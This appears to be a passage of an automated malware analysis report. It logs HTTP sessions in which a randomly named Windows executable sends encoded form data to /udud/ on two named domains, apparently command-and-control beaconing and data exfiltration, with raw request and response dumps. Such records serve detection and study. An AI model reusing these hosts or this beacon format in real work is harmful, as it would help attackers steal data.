                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 55 43 38 76 66 42 69 72 50 6a 49 6b 71 34 4c 4a 76 36 68 54 70 57 70 34 56 48 53 62 66 49 31 68 77 39 6d 32 72 4b 56 30 55 4c 49 6f 58 6d 45 70 52 47 57 6b 75 56 79 44 7a 78 48 56 62 32 47 4f 6e 6a 39 52 31 76 32 6a 51 78 52 49 63 67 73 6a 48 75 67 52 79 77 4a 56 53 48 6e 48 69 4c 2f 35 68 4b 6b 56 45 4b 6a 2b 6d 4b 38 7a 73 72 31 6b 57 61 62 4c 37 59 30 76 30 2b 5a 48 6d 4a 73 46 31 57 78 4a 66 6e 45 4a 4d 47 64 79 4a 38 73 63 56 55 52 5a 54 71 76 79 46 64 71 39 45 52 56 4f 42 64 76 48 6a 55 48 50 73 4c 71 48 4f 66 36 4f 54 54 45 58 4a 6e 6c 78 54 37 72 56 70 54 31 6a 6d 36 79 6f 76 53 6c 58 53 34 43 69 70 50 68 36 78 66 4e 37 66 70 38 3d
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkq4LJv6hTpWp4VHSbfI1hw9m2rKV0ULIoXmEpRGWkuVyDzxHVb2GOnj9R1v2jQxRIcgsjHugRywJVSHnHiL/5hKkVEKj+mK8zsr1kWabL7Y0v0+ZHmJsF1WxJfnEJMGdyJ8scVURZTqvyFdq9ERVOBdvHjUHPsLqHOf6OTTEXJnlxT7rVpT1jm6yovSlXS4CipPh6xfN7fp8=
                                                                                                May 27, 2024 12:33:09.877173901 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:09 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                27192.168.11.30498573.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:12.405865908 CEST1682OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.mindfreak.live
                                                                                                Referer: http://www.mindfreak.live/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 55 43 38 76 66 42 69 72 50 6a 49 6b 71 34 4c 4a 76 36 68 54 70 57 70 34 56 48 53 62 66 49 31 68 77 39 6d 32 72 4b 56 30 55 4e 51 6f 57 56 63 70 41 52 69 6b 74 56 79 44 39 52 48 55 62 32 47 54 6e 6a 6c 64 31 75 4b 5a 51 30 4e 49 64 48 73 6a 54 50 67 52 37 77 4a 56 5a 6e 6e 61 73 72 2f 6f 68 4b 55 4a 45 4b 7a 2b 6d 4b 38 7a 73 74 35 6b 66 6f 7a 4c 35 59 30 73 39 65 5a 78 69 4a 73 68 31 57 4a 5a 66 6e 78 32 4d 32 39 79 4a 59 4d 63 54 6e 35 5a 63 71 76 73 45 64 71 62 45 52 59 55 42 64 62 78 6a 55 44 70 73 4c 43 48 4e 72 2f 33 57 69 67 57 56 58 31 68 5a 66 58 4a 70 56 74 51 6b 39 43 52 73 54 68 34 55 36 71 7a 6b 76 39 79 70 74 35 2f 4e 63 57 43 4d 7a 34 45 50 32 69 71 38 2f 6d 6c 6e 41 42 48 6a 4a 66 43 55 46 77 6f 65 4f 35 68 36 56 4e 6b 42 70 70 4c 38 66 6f 70 32 46 6f 54 77 41 6c 41 4e 71 6b 58 66 4c 32 70 6e 47 37 35 41 45 6c 79 35 70 68 4b 61 6c 33 39 6d 37 78 70 4b 66 6e 2b 75 75 6f 69 62 78 69 4a 39 48 56 51 31 37 65 39 77 41 6b 39 77 78 36 6a 78 34 6c 6c 37 41 46 74 61 [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=UC8vfBirPjIkq4LJv6hTpWp4VHSbfI1hw9m2rKV0UNQoWVcpARiktVyD9RHUb2GTnjld1uKZQ0NIdHsjTPgR7wJVZnnasr/ohKUJEKz+mK8zst5kfozL5Y0s9eZxiJsh1WJZfnx2M29yJYMcTn5ZcqvsEdqbERYUBdbxjUDpsLCHNr/3WigWVX1hZfXJpVtQk9CRsTh4U6qzkv9ypt5/NcWCMz4EP2iq8/mlnABHjJfCUFwoeO5h6VNkBppL8fop2FoTwAlANqkXfL2pnG75AEly5phKal39m7xpKfn+uuoibxiJ9HVQ17e9wAk9wx6jx4ll7AFtaww6CUI8lpEH0s0xdgby5jC1FMiMOxc4UT0ber/YeLpSA2bnebQTzThTvEgfGwgNdsk4gLJBb9UneFEbjLAnRSffsztbniBZ63Y7fuHOhL24a/bkcIukW0gCxZfYM37TQYiUD0GwjMlpoE/7Z8hnFTc7m9irp0DW8WQ7nTH5jQGCEZ3UUAmOMMwdfpRcHZN67FUArY7LZmnQbjUsnFhAvUUERJtyaAocXa+zNq2j7JqnL6IDvrxrEgsiR+nO6T50q3fdPhs5IqF9q5tCHbYo86Y5RY86+YTeCpkGxhkbZKkPCdqR2ooDwDYTwwP2lT2PWuwkCkB9Q3PS+HSa1ngP61E3RTHV9R3B6mqayXbd9U2So1N4wz5Jq2J2ifyLBmqiqmCHlm6rD7bAsHuuP7mmUkv0hluMIqet2j6pUkPu38z3vx5V3FCU7xHWyBD1f7WN1XTT2qaDInjJZnKiYpahomMNloryL/A/YydRZ3G1j/Ds0Fvm/ZZ4+smpahMsElXIsavCNzagZyCrhdtgs9VDjiewLiJgQn9P0lw+lUYhmbZg+xdoiNImJ3ITOLDu/9Q1em7xIIjkY+LC7laj3sSIcu8pirflOsdll7gYrjsf4B6plOUJ9YWrTI2WV+6BOPzVGiGDoQbNKzNQaSu0kTpIUz2X6qcwc/RjLsf [TRUNCATED]
                                                                                                May 27, 2024 12:33:12.590385914 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:12 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                28192.168.11.30498583.64.163.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:15.123573065 CEST479OUTGET /udud/?Pl9P8ldX=ZAUPc22UbAwlmqOcpZtb9jQGZGjNIs5k58OhtZslT+MlZ0MzYVnBwyOCsTvhGHepry8Cy/mecRlkAgE9OO4LtQYiaVzF77nK3tMxOKzIpokQntNvdpDg3pI=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.mindfreak.live
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:15.308109999 CEST292INHTTP/1.1 410 Gone
                                                                                                Server: openresty
                                                                                                Date: Mon, 27 May 2024 10:33:15 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 34 65 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 30 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 6d 69 6e 64 66 72 65 61 6b 2e 6c 69 76 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 7<html>9 <head>4e <meta http-equiv='refresh' content='0; url=http://www.mindfreak.live/' />a </head>8</html>0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                29192.168.11.3049859217.70.184.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:29.346239090 CEST739OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.avocatmh.org
                                                                                                Referer: http://www.avocatmh.org/udud/
                                                                                                Content-Length: 205
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 50 47 52 61 36 43 31 34 58 2f 4b 47 6d 43 41 33 61 4b 6b 71 38 36 72 5a 56 75 51 6d 73 55 45 36 34 69 48 48 6c 49 49 34 49 6d 38 7a 73 2f 6e 66 75 59 4a 51 48 41 62 33 77 50 30 7a 77 67 4a 5a 36 61 68 63 59 70 30 36 4d 38 37 2f 4a 57 52 78 67 6f 4c 62 48 71 39 62 6c 43 55 50 6b 55 38 4b 34 4e 39 49 37 69 63 2b 33 45 69 67 77 43 73 6a 37 49 56 6e 4c 33 48 35 55 37 4c 44 65 37 79 73 59 77 49 72 34 74 5a 38 62 54 61 44 36 55 62 77 6f 67 47 6f 4b 73 59 36 50 42 55 2f 38 68 39 48 76 71 51 50 62 38 65 5a 37 46 48 73 30 61 30 72 37 31 52 72 76 45 44 39 65 46 6e 48 33 54 67 66 64 41 3d 3d
                                                                                                Data Ascii: Pl9P8ldX=PGRa6C14X/KGmCA3aKkq86rZVuQmsUE64iHHlII4Im8zs/nfuYJQHAb3wP0zwgJZ6ahcYp06M87/JWRxgoLbHq9blCUPkU8K4N9I7ic+3EigwCsj7IVnL3H5U7LDe7ysYwIr4tZ8bTaD6UbwogGoKsY6PBU/8h9HvqQPb8eZ7FHs0a0r71RrvED9eFnH3TgfdA==
                                                                                                May 27, 2024 12:33:29.524604082 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:29 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                30192.168.11.3049860217.70.184.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:32.048609018 CEST759OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.avocatmh.org
                                                                                                Referer: http://www.avocatmh.org/udud/
                                                                                                Content-Length: 225
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 50 47 52 61 36 43 31 34 58 2f 4b 47 6d 6a 51 33 59 6f 4d 71 30 36 72 65 61 4f 51 6d 69 30 45 2b 34 69 4c 48 6c 4a 39 2f 4c 56 55 7a 73 61 6a 66 74 64 6c 51 4f 51 62 33 34 76 30 79 39 41 4a 48 36 62 63 68 59 6f 6b 36 4d 2f 48 2f 4a 58 68 78 67 5a 4c 59 56 71 39 5a 70 69 55 4e 67 55 38 4b 34 4e 39 49 37 69 4a 52 33 45 36 67 77 53 63 6a 36 71 78 67 47 58 48 34 44 4c 4c 44 61 37 79 53 59 77 4a 4d 34 6f 34 30 62 52 69 44 36 56 72 77 73 68 47 6e 66 63 59 77 42 68 55 76 32 44 38 7a 76 75 38 43 56 63 53 58 7a 77 37 67 34 74 46 78 6d 32 6c 70 38 6b 2f 51 43 45 4b 76 31 52 68 45 41 4f 68 51 71 47 4a 32 78 69 59 52 45 45 66 4b 31 34 5a 34 78 6b 73 3d
                                                                                                Data Ascii: Pl9P8ldX=PGRa6C14X/KGmjQ3YoMq06reaOQmi0E+4iLHlJ9/LVUzsajftdlQOQb34v0y9AJH6bchYok6M/H/JXhxgZLYVq9ZpiUNgU8K4N9I7iJR3E6gwScj6qxgGXH4DLLDa7ySYwJM4o40bRiD6VrwshGnfcYwBhUv2D8zvu8CVcSXzw7g4tFxm2lp8k/QCEKv1RhEAOhQqGJ2xiYREEfK14Z4xks=
                                                                                                May 27, 2024 12:33:32.226687908 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:32 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                31192.168.11.3049861217.70.184.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:34.753829002 CEST1676OUTPOST /udud/ HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Origin: http://www.avocatmh.org
                                                                                                Referer: http://www.avocatmh.org/udud/
                                                                                                Content-Length: 1141
                                                                                                Cache-Control: max-age=0
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                Data Raw: 50 6c 39 50 38 6c 64 58 3d 50 47 52 61 36 43 31 34 58 2f 4b 47 6d 6a 51 33 59 6f 4d 71 30 36 72 65 61 4f 51 6d 69 30 45 2b 34 69 4c 48 6c 4a 39 2f 4c 54 4d 7a 73 4d 66 66 2f 2b 64 51 55 51 62 33 6b 2f 30 76 39 41 49 62 36 61 31 71 59 6f 70 42 4d 36 4c 2f 49 31 70 78 69 72 7a 59 66 71 39 5a 68 43 55 4f 6b 55 39 51 34 4e 4d 42 37 69 5a 52 33 45 36 67 77 55 59 6a 2f 49 56 67 45 58 48 35 55 37 4c 66 65 37 79 70 59 77 51 7a 34 6f 4d 6b 61 6c 57 44 37 31 37 77 71 44 65 6e 64 38 59 32 4d 42 56 77 32 44 77 73 76 71 6c 39 56 63 33 4b 7a 33 50 67 72 49 35 74 35 33 64 6a 67 6e 43 54 47 32 65 71 30 67 6c 67 50 4e 5a 37 35 45 4a 34 37 68 4d 41 66 30 50 66 71 4c 4a 35 6c 42 71 6d 44 79 46 53 70 52 54 6a 30 61 4f 2f 7a 79 4c 69 78 73 61 53 6a 62 75 35 4c 5a 61 58 65 6f 73 2f 51 55 51 4c 6c 63 5a 30 68 49 59 63 76 77 52 4b 37 41 2f 6c 30 50 4f 71 6c 4b 6a 79 4b 6d 43 69 57 6a 6e 49 71 76 4f 33 4b 42 76 72 72 57 7a 59 78 36 66 49 35 56 6e 6c 38 2f 61 61 35 6c 31 2b 4c 7a 79 31 62 41 75 71 7a 6e 37 5a 46 48 37 70 6f [TRUNCATED]
                                                                                                Data Ascii: Pl9P8ldX=PGRa6C14X/KGmjQ3YoMq06reaOQmi0E+4iLHlJ9/LTMzsMff/+dQUQb3k/0v9AIb6a1qYopBM6L/I1pxirzYfq9ZhCUOkU9Q4NMB7iZR3E6gwUYj/IVgEXH5U7Lfe7ypYwQz4oMkalWD717wqDend8Y2MBVw2Dwsvql9Vc3Kz3PgrI5t53djgnCTG2eq0glgPNZ75EJ47hMAf0PfqLJ5lBqmDyFSpRTj0aO/zyLixsaSjbu5LZaXeos/QUQLlcZ0hIYcvwRK7A/l0POqlKjyKmCiWjnIqvO3KBvrrWzYx6fI5Vnl8/aa5l1+Lzy1bAuqzn7ZFH7po6LLixlIhvlaR1TAfoIbJOKsb56I7Gw2QrMNXl178BpVjWaNamdXBcUuYFZoIPEBg8Ig/N6ECEJBT/2IhzjabgeQ86Q9crPi+d977WmcLSmPGuY6e9q7B6Qodsf+WkhGnrW9J89iwDtUW30C3/BnHi5mDABzWFg2jeHg3dXH9yVRRUtDRaWeUc2rPH4wQpFhHTmpDqisLbneeebs9eWRyfYyTx60M0bl6F2rDBToT39qwhfNROx71EsCvcPYIjPpY+LvauJAmfO+A0TmKy3RMhuYQm9/fsRoQX3Ks3NuC41ZzQP9cqWvPwrkGyClvJSB779rMrQZ89v5EdE0qyA4DiNRvmobiyg7cxkgCvie95pZFQ0SoHZr6PFpA92tlsfWjOa+5Q6idn8u8i0I97HkNUiv5qpWIEa6PgSvIfVh5MpOVXkSDYnQoXVkGPDjJnJnpKiA5NyClpKRfqA2MpgHH9ZWsheP1UmO3AA9XA/1CackGOM5SzfyxzHYbExGL9vKpF3xoRRCqY5XClOjODf3gscuGQDBs4oxVG2eLVN0u+dOj13sOQbU1jSfiivUlR+WHyRDZT00WHT6dMHtRpstvjd3tC4G+GzlXl5s+WX/rVCSSnmyIIAhx4eqfC2eIlB9g5Lw/hE7dW458f7+Yx/vFN+S3owz7jWbU5G [TRUNCATED]
                                                                                                May 27, 2024 12:33:34.932465076 CEST608INHTTP/1.1 501 Unsupported method ('POST')
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:34 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
                                                                                                Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                32192.168.11.3049862217.70.184.50807584C:\Program Files (x86)\qUiDoputyglQzVYibDRasYiPLhrIcQavufTxYIuNXmAUmzqYssSJmsSX\jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                May 27, 2024 12:33:37.453708887 CEST477OUTGET /udud/?Pl9P8ldX=CE5650FDbfXnpQA/eK0NgrbRbNtPjFAUxQ7joq83O2JD2van08dDJXT7jPsZwBcB76Ina7ciMfrueGFKvr7HGptlhVNK1F0UnKlYvzZl0mKZiEoX7KROJkU=&UJ2H=ED2dW8S8UxwlG HTTP/1.1
                                                                                                Host: www.avocatmh.org
                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Connection: close
                                                                                                User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                                                                May 27, 2024 12:33:37.632857084 CEST1289INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Mon, 27 May 2024 10:33:37 GMT
                                                                                                Content-Type: text/html
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                Vary: Accept-Encoding
                                                                                                Vary: Accept-Language
